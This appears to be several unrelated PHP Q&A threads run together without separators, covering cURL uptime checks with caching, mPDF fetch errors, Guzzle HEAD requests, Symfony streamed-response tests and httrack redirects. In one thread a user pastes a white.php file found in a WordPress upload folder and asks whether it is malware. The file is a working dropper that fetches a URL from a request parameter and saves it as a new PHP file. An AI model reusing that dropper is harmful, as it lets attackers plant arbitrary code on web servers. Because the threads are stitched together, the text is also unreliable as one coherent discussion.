I'm using my WordPress functions.php file to check whether every image displayed is up or down. I think what I want to do is break the function below into two:
Function 1: check if mirror1.com is up (instead of checking every image in a loop), and set the host depending on the HTTP status of mirror1.com (if mirror1.com is down, use mirror2.com) -- pass that into $mirror_website.
Function 2: simply receive $mirror_website (the front end has <img src="<?php echo $mirror_website; ?>/image.png">).
The code below works, but it checks EVERY single image and slows down the site.
function amazons3acctreplaceto() {
    $url = 'http://www.mirror1.com';
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_NOBODY, true);         // headers only, skip the body
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    curl_exec($ch);
    $retcode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    if (200 == $retcode) {
        $as3replaceto = "www.mirror1.com"; // All's well
    } else {
        $as3replaceto = "www.mirror2.com"; // not so much
    }
    return $as3replaceto;
}
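In outline, the split I'm after would look something like this (a rough sketch; get_mirror_website and mirror_image_src are placeholder names I made up, not existing functions):
// Function 1: decide which mirror host to use (run once, not once per image).
function get_mirror_website() {
    $ch = curl_init('http://www.mirror1.com');
    curl_setopt($ch, CURLOPT_NOBODY, true);         // status check only, no body
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 5);           // don't let a dead mirror hang the page
    curl_exec($ch);
    $retcode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    return (200 == $retcode) ? 'http://www.mirror1.com' : 'http://www.mirror2.com';
}
// Function 2: hand the chosen host to the template.
function mirror_image_src($path) {
    static $mirror_website = null;                  // remembered for the rest of the request
    if ($mirror_website === null) {
        $mirror_website = get_mirror_website();
    }
    return $mirror_website . '/' . ltrim($path, '/');
}
The front end would then just do <img src="<?php echo mirror_image_src('image.png'); ?>">.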
A simple solution might be to cache the result (e.g. in APC or memcache) with a TTL, so you don't need to work out whether the site is up or down on every request.
E.g. here's an example that might work, using APC to cache the site status for 2 minutes:
function amazons3acctreplaceto() {
    $as3replaceto = FALSE;
    if (function_exists('apc_fetch')) {
        $as3replaceto = apc_fetch('as3replaceto');
    }
    if ($as3replaceto === FALSE) {
        $url = 'http://www.mirror1.com';
        $ch = curl_init($url);
        curl_setopt($ch, CURLOPT_NOBODY, true);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
        curl_exec($ch);
        $retcode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        curl_close($ch);
        if (200 == $retcode) {
            $as3replaceto = "www.mirror1.com"; // All's well
        } else {
            $as3replaceto = "www.mirror2.com"; // not so much
        }
        if (function_exists('apc_store')) {
            apc_store('as3replaceto', $as3replaceto, 120); // Store status for 2 minutes
        }
    }
    return $as3replaceto;
}
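Since this is WordPress, the Transients API would do the same job without depending on the APC extension; a minimal sketch along the same lines (get_transient and set_transient are core WordPress functions):
function amazons3acctreplaceto() {
    // get_transient() returns false when the value is missing or expired
    $as3replaceto = get_transient('as3replaceto');
    if ($as3replaceto === false) {
        $ch = curl_init('http://www.mirror1.com');
        curl_setopt($ch, CURLOPT_NOBODY, true);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
        curl_exec($ch);
        $retcode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        curl_close($ch);
        $as3replaceto = (200 == $retcode) ? 'www.mirror1.com' : 'www.mirror2.com';
        set_transient('as3replaceto', $as3replaceto, 120); // cache status for 2 minutes
    }
    return $as3replaceto;
}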
I found a white.php file in my /upload/cache WordPress folder.
It contains this code:
<?php
$name = '68aa884d96d2e824669d2d.php';
$ch = curl_init ($_REQUEST['68aa884d96d2e824669d2d']);
$fp = fopen ($name, "w+");
curl_setopt ($ch, CURLOPT_FILE, $fp);
$ult = curl_exec ($ch);
curl_close ($ch);
fclose ($fp);
if(!$ult){
$f = file_get_contents($_REQUEST['68aa884d96d2e824669d2d']);
file_put_contents($name,$f);
}
I'm a noob developer; I would like to know whether this is malware and, if so, how I could investigate the issue.
Thank you.
mPDF has stopped working for me; PDFs generated from PHP are now blank. When I turn on debug I get the following error message:
Error detected. PDF file generation aborted: file_get_contents(https://www.myurl.com/pdf.php): failed to open stream: operation failed
When I go directly to the PHP page it appears fine.
Here is the code I'm using. I changed permissions to 777 on the file and the folder and it still doesn't work, yet if I change the URL to an external one it works perfectly. So I'm guessing something on my server is blocking it.
require __DIR__ . '/vendor/autoload.php';

$invoice_id = $_GET['invoice_id'];
$url = "https://www.myurl.com/pdf.php";

if (ini_get('allow_url_fopen')) {
    $html = file_get_contents($url);
} else {
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $html = curl_exec($ch);
    curl_close($ch);
}

try {
    $mpdf = new \Mpdf\Mpdf();
    $mpdf->debug = true;
    $mpdf->SetDisplayMode('fullwidth');
    $mpdf->CSSselectMedia = 'mpdf'; // assuming you used this in the document header
    $mpdf->setBasePath($url);
    $mpdf->WriteHTML($html);
    $mpdf->Output('invoice' . $invoice_id . '.pdf', 'D');
} catch (\Mpdf\MpdfException $e) { // Note: safer fully qualified exception
    echo $e->getMessage();
}
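To narrow down what the fetch actually returns before it reaches mPDF, something like this diagnostic sketch might help (same $url as above; the checks are assumptions about where it fails, not a fix):
// Fetch with cURL and surface failure details instead of passing an
// empty string to mPDF (an empty string renders as a blank PDF).
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$html = curl_exec($ch);
if ($html === false) {
    die('cURL error: ' . curl_error($ch));
}
$status = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if ($status !== 200 || $html === '') {
    die("Unexpected response: HTTP $status, " . strlen($html) . " bytes");
}
If the cURL error points at DNS or a connection timeout, the server may simply be unable to reach its own public hostname (a common loopback/firewall restriction), in which case fetching via localhost or including pdf.php directly would sidestep the problem.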
To get the status code of a website with cURL you can use CURLOPT_NOBODY.
Example:
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, 'http://www.example.com');
curl_setopt($curl, CURLOPT_NOBODY, true);          // HEAD-style request, no body
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_exec($curl);
$status = curl_getinfo($curl, CURLINFO_HTTP_CODE); // the status code itself
curl_close($curl);
Is the following example, using Guzzle as the HTTP library, equivalent?
$guzzle = new Client();
$req = $guzzle->createRequest('GET', 'http://www.example.com');
$result = $guzzle->send($req);
$status = $result->getStatusCode();
My goal is to perform a curl/Guzzle request without fetching the body. Will that Guzzle request only fetch the status code, without wasting bandwidth on other data?
In order to get the status code of the response without downloading the whole content, you should use the "head" method:
$client = new \GuzzleHttp\Client();
$response = $client->head('http://example.com/');
echo $response->getStatusCode();
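Note that a GET, as in the question, transfers the body even if you only read the status code afterwards; HEAD asks the server not to send one. On Guzzle 6+ the same thing can be written as below (a sketch; http_errors is disabled so 4xx/5xx codes are returned rather than thrown):
$client = new \GuzzleHttp\Client();
// Explicit HEAD request; no response body is transferred.
$response = $client->request('HEAD', 'http://example.com/', ['http_errors' => false]);
echo $response->getStatusCode();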
I am writing functional tests with Symfony2.
I have a controller that calls a getImage() function which streams an image file as follows:
public function getImage($filePath)
{
    $response = new StreamedResponse();
    $response->headers->set('Content-Type', 'image/png');
    $response->setCallback(function () use ($filePath) {
        $bytes = @readfile($filePath); // returns false on failure
        if ($bytes === false || $bytes <= 0) {
            throw new NotFoundHttpException();
        }
    });
    return $response;
}
In functional testing, I try to request the content with the Symfony test client as follows:
$client = static::createClient();
$client->request('GET', $url);
$content = $client->getResponse()->getContent();
The problem is that $content is empty, I guess because the response is considered complete as soon as the HTTP headers are received by the client, without waiting for the streamed data to be delivered.
Is there a way to catch the content of the streamed response while still using $client->request() (or even some other function) to send the request to the server?
You want sendContent (rather than getContent): sendContent executes the callback that you've set, whereas getContent just returns false for streamed responses in Symfony2.
Using sendContent you can enable the output buffer and assign the content to that for your tests, like so:
$client = static::createClient();
$client->request('GET', $url);
// Enable the output buffer
ob_start();
// Send the response to the output buffer
$client->getResponse()->sendContent();
// Get the contents of the output buffer
$content = ob_get_contents();
// Clean the output buffer and end it
ob_end_clean();
You can read more about output buffering in the PHP manual; the StreamedResponse API is in the Symfony documentation.
For me it didn't work like that. Instead, I used ob_start() before making the request, and after the request I used $content = ob_get_clean() and made assertions on that content.
In test:
// Enable the output buffer
ob_start();
$this->client->request(
    'GET',
    $url,
    array(),
    array(),
    array('CONTENT_TYPE' => 'application/json')
);
// Get the output buffer and clean it
$content = ob_get_clean();
$this->assertEquals('my response content', $content);
Maybe this was because my response is a CSV file.
In controller:
$response->headers->set('Content-Type', 'text/csv; charset=utf-8');
The currently accepted answer worked well for me for some time, but for some reason it doesn't anymore: the response is parsed into a DOM crawler and the binary data is lost.
I could fix that by using the internal response. Here's the git patch of my changes[1]:
- ob_start();
$this->request('GET', $uri);
- $responseData = ob_get_clean();
+ $responseData = self::$client->getInternalResponse()->getContent();
I hope this can help someone.
[1]: you just need access to the client, which is a
Symfony\Bundle\FrameworkBundle\KernelBrowser
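Put together, the test would read something like this (a sketch assuming a standard WebTestCase client):
$client = static::createClient();
$client->request('GET', $url);
// BrowserKit's internal response keeps the raw (possibly binary) body,
// so nothing is lost to the DOM crawler.
$content = $client->getInternalResponse()->getContent();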
I'm trying to mirror webpages recursively, starting from a URL supplied by the user (there is a depth limit set, of course). Wget didn't catch links from CSS/JS, so I decided to use httrack.
I try to mirror a site like this:
# httrack http://onet.pl -r6 --ext-depth=6 -O ./a "+*"
This website uses a 301 redirect to http://www.onet.pl:80, and httrack just downloads an index.html page containing:
<a HREF="onet.pl/index.html" >Page has moved</a>
and nothing more! When I run:
# httrack http://www.onet.pl -r6 --ext-depth=6 -O ./a "+*"
it does what I want.
Is there any way to make httrack follow redirects? Currently I just prepend "www." to httrack's URLs, but that's not a real solution (it doesn't cover all user cases). Are there any better website mirroring tools for Linux?
On the main httrack forum, one of the developers said that it's not possible.
The proper solution is to use another web mirroring tool.
You could use this script to first determine the real target URL and then run httrack against that URL:
function getCorrectUrl($url) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_HEADER, true);
    curl_setopt($ch, CURLOPT_NOBODY, true);   // the headers are all we need
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_URL, $url);
    $out = curl_exec($ch);
    curl_close($ch);
    // line endings are the wonkiest piece of this whole thing
    $out = str_replace("\r", "", $out);
    // only look at the headers
    $headers_end = strpos($out, "\n\n");
    if ($headers_end !== false) {
        $out = substr($out, 0, $headers_end);
    }
    $headers = explode("\n", $out);
    foreach ($headers as $header) {
        // header names are case-insensitive in HTTP
        if (stripos($header, "Location: ") === 0) {
            return trim(substr($header, 10));
        }
    }
    return $url;
}
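Alternatively, cURL can follow the whole redirect chain itself and report where it ended up, which also covers multi-hop redirects; a sketch:
function getFinalUrl($url) {
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_NOBODY, true);             // status/headers only
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);     // follow 301/302/... chains
    curl_setopt($ch, CURLOPT_MAXREDIRS, 10);            // guard against redirect loops
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_exec($ch);
    $final = curl_getinfo($ch, CURLINFO_EFFECTIVE_URL); // URL after all redirects
    curl_close($ch);
    return $final;
}
You would then run httrack against getFinalUrl($userUrl) instead of the raw user input.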